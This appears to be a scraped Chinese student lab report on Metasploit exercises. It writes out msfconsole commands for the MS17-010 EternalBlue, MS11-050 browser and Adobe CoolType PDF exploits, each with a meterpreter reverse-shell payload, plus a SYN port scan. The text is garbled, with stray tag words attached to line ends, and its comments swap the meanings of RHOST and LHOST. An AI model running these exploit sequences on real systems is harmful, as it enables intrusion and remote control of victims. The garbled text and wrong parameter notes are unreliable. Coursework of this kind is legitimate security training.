本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:html
1.1一个主动攻击实践,如ms08_067; (1分)windows
1.2 一个针对浏览器的攻击,如ms11_050;(1分)浏览器
1.3 一个针对客户端的攻击,如Adobe;(1分)tcp
1.4 成功应用任何一个辅助模块。(0.5分)编码
以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分。线程
用本身的话解释什么是exploit,payload,encode.code
用本身感受通俗的话来讲:orm
exploit:渗透攻击,利用发现的漏洞对靶机进行攻击。htm
payload:攻击载荷,渗透攻击成功后在系统中运行的模块,即经过渗透攻击把攻击载荷运至靶机中。blog
Ecode:编码器,对代码进行异或、祛除坏字符及其余编码,保护攻击载荷不被发现。
ms17_010
攻击机 靶机ping通
输入msfconsole指令,打开控制台
use exploit/windows/smb/ms17_010_eternalblue //使用漏洞 set payload windows/x64/meterpreter/reverse_tcp //选择攻击载荷 set RHOST //设置攻击方ip set LHOST //设置靶机ip exploit
ms11_050
输入msfconsole指令,打开控制台
msf > use windows/browser/ms11_050_mshtml_cobjectelement //使用浏览器ms11_050漏洞 msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //使用http反向回连 msf exploit(ms11_050_cobjectelement) > set LHOST //攻击方ip msf exploit(ms11_050_cobjectelement) > set LPORT 5219 //攻击方攻击端口固定 msf exploit(ms11_050_cobjectelement) > set URIPATH 5219wyb //统一资源标识符路径设置
show options
exploit攻击之后,将生成的网址在靶机中打开,网页打开失败,浏览器中止工做,攻击失败
Adobe
输入msfconsole指令,打开控制台
use windows/fileformat/adobe_cooltype_sing //选择攻击模块 set payload windows/meterpreter/reverse_tcp //设置tcp反向链接 set LHOST //攻击方IP set LPORT 5219 //攻击方攻击端口 set FILENAME 20165219exp5.pdf //生成的文件名
获得文件路径
找到文件并复制到靶机
由于我没有装xp虚拟机,w7不能打开
use auxiliary/scanner/portscan/syn(使用portscan模块)
show options
set RHOST 192.168.183.129(目标)
set THREADS 50(线程)
exploit
Adobe实验中 没有找到生成的pdf文件
解决: 根据生成的路径,在终端cd进入文件所在目录,再用复制命令移动到主文件夹下
没有安装xp虚拟机
解决:此次时间不太够了emmm 下次补上
多去尝试新的攻击手法,能够去找一些其余的攻击模块尝试
学会了利用MSF进行多种方式的渗透,可是感受本身对MSF的了解仍是欠缺的,对于指令,并无理解,只是单纯的照搬,之后还需努力